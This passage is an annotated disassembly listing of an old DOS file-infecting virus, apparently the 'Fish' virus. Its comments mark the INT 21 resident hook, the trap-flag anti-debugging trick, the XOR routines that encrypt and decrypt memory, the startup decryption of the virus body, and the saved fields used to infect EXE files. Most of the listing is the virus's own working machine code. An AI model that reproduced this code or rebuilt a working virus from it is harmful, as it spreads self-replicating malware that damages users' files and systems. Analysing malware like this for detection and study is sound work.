3411:0DD0 1F             POP	DS 
3411:0DD1 E826F4         CALL   01FA            ; CARP2 - set interrupt
3411:0DD4 9C             PUSHF	 
3411:0DD5 58             POP	AX 
3411:0DD6 0D0001         OR	AX,0100 
3411:0DD9 50             PUSH	AX 
3411:0DDA 9D             POPF	 
3411:0DDB 40             INC	AX 
3411:0DDC F7E0           MUL	AX 
3411:0DDE 37             AAA	 
3411:0DDF A3310E         MOV	[0E31],AX 
3411:0DE2 E88AF3         CALL   016F            ; COD2 - restore registers
3411:0DE5 C3             RET
3411:0DE6 FF
3411:0DE7 55             PUSH   BP
3411:0DE8 89E5           MOV    BP,SP
3411:0DEA 50             PUSH   AX
3411:0DEB 817E0400C0     CMP    Word Ptr [BP+04],C000           ; In ROM?
3411:0DF0 730C           JNB	0DFE 
3411:0DF2 2EA1470E       MOV	AX,CS:[0E47] 
3411:0DF6 394604         CMP	[BP+04],AX 
3411:0DF9 7603           JBE	0DFE 
3411:0DFB 58             POP	AX 
3411:0DFC 5D             POP	BP 
3411:0DFD CF             IRET
3411:0DFE 2E803E500E01   CMP    Byte Ptr CS:[0E50],01
3411:0E04 7426           JZ	0E2C 
3411:0E06 8B4604         MOV	AX,[BP+04] 
3411:0E09 2EA32F0E       MOV	CS:[0E2F],AX 
3411:0E0D 8B4602         MOV	AX,[BP+02] 
3411:0E10 2EA32D0E       MOV	CS:[0E2D],AX 
3411:0E14 720F           JB	0E25 
3411:0E16 58             POP	AX 
3411:0E17 5D             POP	BP 
;  Launch EXE?
3411:0E18 2E8B26DF0E     MOV	SP,CS:[0EDF] 
3411:0E1D 2E8E16DD0E     MOV	SS,CS:[0EDD] 
3411:0E22 E934FF         JMP    0D59
3411:0E25 816606FFFE     AND	Word Ptr [BP+06],FEFF 
3411:0E2A EBCF           JMP	0DFB 
3411:0E2C 2EFE0E510E     DEC	Byte Ptr CS:[0E51] 
3411:0E31 75C8           JNZ	0DFB 
3411:0E33 816606FFFE     AND	Word Ptr [BP+06],FEFF 
3411:0E38 E871F3         CALL   01AC            ; SHARK2 - save regs internal
3411:0E3B E81EF3         CALL   015C            ; COD1 - save registers
3411:0E3E B42C           MOV    AH,2C           ; Get system time
3411:0E40 E80EF3         CALL	0151 
3411:0E43 2E8816510D     MOV	CS:[0D51],DL 
3411:0E48 2E88166E0D     MOV	CS:[0D6E],DL 
3411:0E4D 80EC02         SUB    AH,02           ; Get system date, 2A
3411:0E50 E8FEF2         CALL	0151 
3411:0E53 02F2           ADD	DH,DL 
3411:0E55 2E8836840D     MOV	CS:[0D84],DH 
3411:0E5A 2E8836DC0D     MOV	CS:[0DDC],DH 
3411:0E5F B003           MOV    AL,03           ; Breakpoint debug - INT3
3411:0E61 E8ACF3         CALL   0210            ; CARP3 - get interrupt
3411:0E64 06             PUSH	ES 
3411:0E65 1F             POP	DS 
3411:0E66 89DA           MOV	DX,BX 
3411:0E68 B001           MOV	AL,01 
3411:0E6A E88DF3         CALL   01FA            ; CARP2 - set interrupt
3411:0E6D E8FFF2         CALL   016F            ; COD2 - restore registers
3411:0E70 E85FF3         CALL   01D2            ; SHARK3
3411:0E73 E811F3         CALL   0187            ; SHARK1 - rest regs internal
;  Encryption
3411:0E76 53             PUSH	BX 
3411:0E77 51             PUSH	CX 
3411:0E78 BB2800         MOV	BX,0028 
3411:0E7B B98702         MOV	CX,0287 
3411:0E7E 2E80370B       XOR	Byte Ptr CS:[BX],0B 
3411:0E82 83C305         ADD	BX,+05 
3411:0E85 E2F7           LOOP	0E7E 
3411:0E87 59             POP	CX 
3411:0E88 5B             POP	BX 
3411:0E89 EB9A           JMP	0E25 
;  I N T 2 1 / T S R  hook
3411:0E8B 2E800E280000   OR     Byte Ptr CS:[0028],00 
3411:0E91 7413           JZ	0EA6 
;  Memory was encrypted, so decrypt it. Then call our
;  INT 21 TSR, the TROUT2 function. Only every fifth byte is
;  encrypted, to save time.
3411:0E93 53             PUSH	BX 
3411:0E94 51             PUSH	CX 
3411:0E95 BB2800         MOV	BX,0028 
3411:0E98 B98702         MOV	CX,0287 
3411:0E9B 2E80370B       XOR	Byte Ptr CS:[BX],0B 
3411:0E9F 83C305         ADD	BX,+05 
3411:0EA2 E2F7           LOOP	0E9B 
3411:0EA4 59             POP	CX 
3411:0EA5 5B             POP	BX 
3411:0EA6 E9F3F4         JMP    039C            ; TROUT2
;  Encryption (for memory?)
3411:0EA9 51             PUSH	CX 
3411:0EAA 53             PUSH	BX 
3411:0EAB BB2800         MOV	BX,0028 
3411:0EAE B9580D         MOV	CX,0D58 
3411:0EB1 2E80371B       XOR	Byte Ptr CS:[BX],1B 
3411:0EB5 43             INC	BX 
3411:0EB6 E2F9           LOOP	0EB1 
3411:0EB8 5B             POP	BX 
3411:0EB9 59             POP	CX 
3411:0EBA E894F2         CALL	0151 
3411:0EBD EB3F           JMP    0EFE
3411:0EBF B82E8F         MOV	AX,8F2E 
3411:0EC2 06             PUSH	ES 
3411:0EC3 41             INC	CX 
3411:0EC4 0E             PUSH	CS 
3411:0EC5 2E8F06430E     POP	CS:[0E43] 
3411:0ECA 2E8F06DB0E     POP	CS:[0EDB] 
3411:0ECF 2E8326DB0EFE   AND	Word Ptr CS:[0EDB],-02 
3411:0ED5 2E803EDA0E00   CMP	Byte Ptr CS:[0EDA],00 
3411:0EDB 7511           JNZ	0EEE 
3411:0EDD 2EFF36DB0E     PUSH	CS:[0EDB] 
3411:0EE2 2EFF1E2D0E     CALL	FAR CS:[0E2D] 
3411:0EE7 7306           JNB	0EEF 
3411:0EE9 2EFE06DA0E     INC	Byte Ptr CS:[0EDA] 
3411:0EEE F9             STC	 
3411:0EEF 2EFF2E410E     JMP    FAR CS:[0E41]
3411:0EF4 8932           MOV	[BP+SI],SI 
3411:0EF6 C02EC606DA     SHR	Byte Ptr [06C6],DA 
3411:0EFB 0E             PUSH	CS 
3411:0EFC 01CF           ADD    DI,CX
;  Startup decryption of virus.
3411:0EFE E80000         CALL	0F01 
3411:0F01 5B             POP    BX              ; Get our offset
3411:0F02 81EBA90D       SUB	BX,0DA9 
3411:0F06 B9580D         MOV	CX,0D58 
3411:0F09 2E80371B       XOR	Byte Ptr CS:[BX],1B 
3411:0F0D 43             INC	BX 
3411:0F0E E2F9           LOOP	0F09 
3411:0F10 2EFE8FB300     DEC	Byte Ptr CS:[BX+00B3] 
3411:0F15 7403           JZ	0F1A 
3411:0F17 E960F4         JMP    037A            ; TROUT
3411:0F1A C3             RET	 
                        DB      ' FISH FI'
3411:0F20 4649
3411:0F23 0000
3411:0F25 0000
3411:0F27 00
3411:0F28 00            ; Drive code, 0 = A:, etc.
3411:0F29 3920          ; File time
3411:0F2B BE1C          ; File date
3411:0F2D F8007408      ; DWORD PTR
3411:0F31 0008
3411:0F33 3500
3411:0F35 0001353D      ; DWORD PTR to previous INT21 handler
3411:0F39 0033
3411:0F3B 353146
3411:0F3E 3A30
3411:0F40 34
3411:0F41 33382038      ; DWORD PTR
3411:0F45 30
3411:0F46 46
3411:0F47 43
3411:0F48 3131
3411:0F4A 2020
3411:0F4C 2020
3411:0F4E 2020
3411:0F50 2020
3411:0F52 20434D
3411:0F55 50
3411:0F56 2020
3411:0F58 2020
3411:0F5A 41
3411:0F5B 48
3411:0F5C 2C31
3411:0F5E 3120
3411:0F60 2020
3411:0F62 2020
3411:0F64 2020
3411:0F66 2020
3411:0F68 2020
3411:0F6A 3B20
3411:0F6C 46
3411:0F6D 6972737420
3411:0F72 6D
3411:0F73 61
3411:0F74 7463
3411:0F76 68EB08
3411:0F79 000B
3411:0F7B 350000
3411:0F7E 0435
3411:0F80 2100
3411:0F82 3335
3411:0F84 31463A
3411:0F87 3034
3411:0F89 334220
3411:0F8C 37
3411:0F8D 3430
3411:0F8F 44
3411:0F90 2020
3411:0F92 2020
3411:0F94 2020
3411:0F96 2020
3411:0F98 2020
3411:0F9A 204A5A
3411:0F9D 0930
3411:0F9F 3434
3411:0FA1 41
3411:0FA2 20F8
3411:0FA4 0100
3411:0FA6 8B7600
3411:0FA9 0010
3411:0FAB 350800
3411:0FAE 0835
3411:0FB0 3C00
3411:0FB2 3335
3411:0FB4 31463A
3411:0FB7 3034
3411:0FB9 334420
3411:0FBC 3830
3411:0FBE 46
3411:0FBF 43
3411:0FC0 3132
3411:0FC2 2020
3411:0FC4 2020
3411:0FC6 2020
3411:0FC8 2020
3411:0FCA 20434D
3411:0FCD 50
3411:0FCE 2020
3411:0FD0 2020
3411:0FD2 41
3411:0FD3 48
3411:0FD4 2C31
3411:0FD6 3220
3411:0FD8 2020
3411:0FDA 20
3411:0FDB 2020
3411:0FDD 2020          ; SS save (for EXE)
3411:0FDF 2020          ; SP save (for EXE)
3411:0FE1 20
3411:0FE2 3B20
3411:0FE4 4E
3411:0FE5 65
3411:0FE6 7874
3411:0FE8 206D61
3411:0FEB 7463
3411:0FED 68502B
3411:0FF0 0000
3411:0FF2 1335
3411:0FF4 0800
3411:0FF6 0B35
3411:0FF8 2100
3411:0FFA 3335
3411:0FFC 31463A
3411:0FFF 3034
3411:1001 3430
3411:1003 2037
3411:1005 3430
3411:1007 3820
3411:1009 2020
3411:100B 2020
3411:100D 2020
3411:100F 2020
3411:1011 2020
3411:1013 4A
3411:1014 5A
3411:1015 0930
3411:1017 3434
3411:1019 41